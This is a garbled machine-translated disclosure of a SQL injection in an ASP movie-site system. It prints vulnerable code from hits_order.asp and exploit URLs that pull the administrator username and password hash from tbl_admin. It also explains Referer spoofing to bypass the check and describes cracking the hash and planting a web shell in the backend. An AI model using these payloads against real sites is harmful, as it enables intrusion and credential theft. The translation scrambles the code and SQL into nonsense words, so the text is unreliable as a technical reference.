Sistem Film 0day mata-hari
: St0p & My5t3ry
Direproduksi, cantumkan http://www.st0p.org sumber
Oh, dan My5t3ry datang dengan lubang, kontak Administrator, resmi, belum ada perhatian kepada saya.
Pertama, saya menyuntikkan masalah
Celah file / p_inc / hits_order.asp
Sebuah 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 | <- # Include file = ".. / P_inc / config.asp" -> <- # Include file = ".. / P_inc / function.asp" -> <- # Include file = ".. / P_inc / function_func.asp" -> <- # Include file = ".. / P_inc / openconn.asp" -> <- # Include file = ".. / P_inc / G_function.asp" -> <% Then JIKA Tidak ChkPost () Lalu G_error_page_1 respon. Redirect G_error_page_1 ( ) respon Akhir () Akhir JIKA 'Panggil para ChkPost / p_inc / function.asp file () berfungsi untuk mendeteksi URL sumber url,numb ) Fungsi G_hitss (url, mati rasa) Dim str str = "" & numb & " id,m_name,m_pic,m_hits,m_content from qingtiandy_movie where m_look=1 order by m_hits desc,id desc" sql = "top pilih" & mati rasa & "id, m_name, m_pic, m_hits, m_content dari qingtiandy_movie mana m_look = 1 order by desc m_hits, id desc" "Saya melihat itu tidak mati rasa, tidak ada penyaring server . CreateObject ( G_RS ) Set rs = server CreateObject (G_RS). , 1 rs. terbuka sql, conn, 1, 1 i = 1 Apakah Sementara Tidak rs. Eof Array ( "d" ,rs ( 0 ) ,url ) ) d_url = url_ (Array ("d", rs (0), url)) "<div class=kkk1_list><a class=bbb href=" & d_url & " title='主演:" & rs ( 2 ) & "'>" & Get_length ( rs ( 1 ) , "" , 32 ) & "</a> (" & rs ( 3 ) & ")</div>" str = str & "yang <div class=kkk1_list> <a class=bbb href=" & d_url &" title='主演:" & rs (2) & "'>" & Get_length (rs (1), "", 32) & "</ a> (" & rs (3) & ") </ div> i = i + 1 rs. MoveNext Lingkaran G_hitss = str End Function %> G_hitss ( request ( "url" ) , request ( "numb" ) ) %> ") document.write ("<% = G_hitss (request (" url "), permintaan (" mati rasa "))%>") 'Filter Berikut mati rasa |
Penggunaan metode seperti
1, Anda dapat langsung menggunakan Referer perangkat lunak palsu, kunjungi alamat berikut untuk mencapai
Melalui XMLHTTP ditempa Referer, kunjungi alamat berikut implementasi
3, oleh JS JAVASCRIPT untuk mengontrol URL sumber
Sebuah
| ( "<a href='/p_inc/hits_order.asp?numb=1 (select str_username from tbl_admin) as username,(select str_pass from tbl_admin) as pass,'>科幻片</a> " ) ; javascript:. dokumen menulis (<a href='/p_inc/hits_order.asp?numb=1 (select str_username dari tbl_admin) sebagai username,(select str_pass dari tbl_admin) sebagai fiksi ilmiah pass,'> </ a> ") ; |
http://www.st0p.org/p_inc/hits_order.asp?numb=1 (str_username pilih dari tbl_admin) sebagai username, (pilih str_pass dari tbl_admin) sebagai lancar,
Catatan: untuk melompati Referer deteksi bisa melalui POST, GET, COOKIE dengan berbagai cara untuk mencapai disuntikkan. . .
Akses ke berikut, username administrator di URL dari link, Hash password yang ditampilkan langsung keluar. .
Crack Hash password yang karena latar belakang dapat langsung mengedit file ASP, ke latar belakang dan mengambil garis SHELL.
Prosedur ini, ada celah lain. Di sini tidak dibuat. .
171 Trackback (s)
Anda harus login untuk mengirim komentar.